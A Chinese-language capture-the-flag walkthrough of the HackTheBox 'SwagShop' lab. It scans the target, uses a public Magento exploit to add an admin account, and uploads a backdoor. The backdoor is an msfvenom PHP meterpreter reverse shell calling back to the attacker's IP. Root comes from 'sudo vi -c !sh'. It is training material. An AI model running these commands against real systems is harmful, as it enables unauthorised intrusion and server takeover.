介绍
今天给大家带来的是一个HTB(hackthebox)的靶机—SwagShop,这是一个easy级别的linux系统的靶机,所以主要是对枚举,信息收集等手段的考察。对OSCP感兴趣的同学也可以去试着去HTB上找些靶机做做看。
信息收集
对目标进行一个初步的扫描。
nmap -T4 -sC -sV10.10.10.140
发现只对22端口以及80端口进行了开放。
顺便对其进行目录遍历,我们发现一个有意思的目录,这个有用,后面再说。
dirbhttp://10.10.10.140 /usr/share/dirb/wordlists/common.txt
我们打开网站,通过火狐的插件Wappalyzer,或者网页logo就可以发现是个开源的电子商务网站。
漏洞利用
通过searchsploit搜索发现漏洞还是挺多的。
我们发现一个RCE漏洞吸引了我们的注意力,所以我们选择37977的漏洞试试,把expcp到我们的目录,发现这个脚本可以创建一个admin权限的账户。但是我们需要改变一下里面的内容,target为我们的目标ip:http://10.10.10.140/index.php,并且删除一些不必要的注释。
参考地址:http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/
此时运行我们的exp
显示我们的exp运行了,但是这个后台地址是不对的,这就要用到刚刚我们扫到的地址了,
http://10.10.10.140/downloader/
这个地址也可以直接用exp添加的账户进行登陆
.
我们成功登陆了后台,之后我们可以用在google找到的后门项目进行备份还原来拿shell,
https://github.com/P34C3-07/LavaMagentoBD
我们可以用msf来生成一个php后门,
msfvenom -pphp/meterpreter/reverse_tcp LHOST=10.10.14.175 LPORT=4444 -f raw >shell.php
之后在压缩包放置你的shell,这里我的路径是
/app/code/community/Lavalamp/Connector/IndexController.php
用Directpackage file upload功能进行上传
上传成功.
接下来msf进行监听,成功返回shell。
我们可以在/home/haris找到第一个user.txt
提权
接下来我们要进行提权,sudo-l看一下,发现可以不用密码就以root权限执行vi。
我们可以去/var/www/html/目录下创建一个文件,利用vi的-c参数进行提权,我们利用这条指令即可提权,如图显示提权成功,获取到root.txt
sudo vi /var/www/html/111 -c '!sh'
相关实验
VulnHub渗透测试实战 :Vulnhub是一个面向公众开放的靶机平台,主旨是让任何人获得信息安全相关的实战经验。里面有很多设计好的练习靶机镜像,每个镜像有一个或多个flag。
长按下面二维码,或点击“阅读原文”,可预览学习(PC端操作最佳哟)
长按开始学习
别忘了投稿哦
大家有好的技术原创文章
欢迎投稿至邮箱:edu@heetian.com
合天会根据文章的时效、新颖、文笔、实用等多方面评判给予200元-800元不等的稿费哦
有才能的你快来投稿吧!
了解投稿详情点击——重金悬赏 | 合天原创投稿涨稿费啦!
点击“阅读全文”,开始学习